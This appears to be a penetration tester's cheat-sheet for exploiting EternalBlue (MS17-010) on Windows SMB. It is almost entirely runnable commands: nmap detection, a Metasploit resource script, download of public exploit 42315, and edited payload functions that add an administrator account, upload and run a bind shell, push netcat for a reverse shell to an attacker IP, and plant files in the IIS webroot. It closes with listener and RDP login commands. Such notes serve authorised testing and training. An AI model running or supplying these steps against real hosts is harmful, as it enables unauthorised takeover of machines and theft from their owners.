EternalBlue (CVE-2017-0144 / MS17-010)

Detection

IP=x.x.x.x
nmap -Pn -sV -p 445 --script=smb-vuln* -d $IP
nmap -Pn -sV -p 445 --script=smb-vuln* --script-args=smbdomain=example,smbusername=user1,smbpassword=mypass -d $IP

Exploit using Metasploit

When it works, a session is opened. See Metasploit.

msf-smb-exploit.rc

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS x.x.x.x
set PAYLOAD windows/x64/shell_bind_tcp
set VERBOSE true
set ExitOnSession false
exploit -j

Run the exploit

sudo msfconsole -q -r msf-smb-exploit.rc

Exploit manually

searchsploit -m 42315
wget -O mysmb.py https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

Add payload to the exploit

Edit function smb_pwn to add a payload. Default payload creates a file “c:\pwned.txt”.

Payload 1 – Add a user

Requires administrator privileges. Be mindful of the password policy when creating accounts.

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Add a user
        service_exec(conn, r'net user /add myprecious yep-MS17-010')
        service_exec(conn, r'net localgroup "Administrators" myprecious /add')

Payload 2 – Bind shell

msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe > shell.exe
def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Start a listener (bind shell)
        smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
        service_exec(conn, r'c:\test.exe')

Payload 3 – Reverse shell with Netcat

cp /usr/share/windows-resources/binaries/nc.exe .
def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Send netcat to the victim and obtain a reverse shell
        smb_send_file(smbConn, 'nc.exe', 'C', '/test.exe')
        service_exec(conn, r'C:\\test.exe -nv x.x.x.x 4444 -e C:\\Windows\\System32\\cmd.exe')

Payload 4 – Send file to IIS default directory

Adapt to get a webshell.

smb_send_file(smbConn, 'test.txt', 'C', '/inetpub/wwwroot/test.txt')

Custom SMB Port

If you need a custom port (not 445), modify mysmb.py to add the port:

class MYSMB(smb.SMB):
        def __init__(self, remote_host, remote_port=4555, use_ntlmv2=True, timeout=8):
                self.__use_ntlmv2 = use_ntlmv2
                self._default_tid = 0
                self._pid = os.getpid() & 0xffff
                self._last_mid = random.randint(1000, 20000)
                if 0x4000 <= self._last_mid <= 0x4110:
                        self._last_mid += 0x120
                self._pkt_flags2 = 0
                self._last_tid = 0  # last tid from connect_tree()
                self._last_fid = 0  # last fid from nt_create_andx()
                self._smbConn = None
                smb.SMB.__init__(self, remote_host, remote_host, sess_port=4555, timeout=timeout)

Find named PIPE

Run full Nmap scan of all ports to find other pipes!

IP=x.x.x.x
impacket-rpcdump $IP > rpc.txt
grep ncacn_np rpc.txt | sort | uniq
git clone https://github.com/p33kab00/pipe-scan.git
cd pipe-scan
python2 pipe-scan.py $IP 139

On Windows

Use piplist.exe from Sysinternals.

.\pipelist.exe

Run the exploit

Requires Python v2, do not use Python v3. Do not forget to edit SMB credentials in the exploit if needed.

pip2 install impacket
IP=x.x.x.x
python2 42315.py $IP $PIPE
python2 42315.py $IP eventlog
# \\$IP\pipe\sql\query
python2 42315.py $IP sql\\query

This can generate errors “ERROR_SERVICE_REQUEST_TIMEOUT” and still work…

Payload 1 (user added)

rdesktop -u myprecious -p yep-MS17-010 $IP -r disk:myshare=/home/kali/share

Payload 2 (bind shell)

nc -nv $IP 4444

Payload 3 (reverse shell, start a listener before exploit)

nc -nlvkp 4444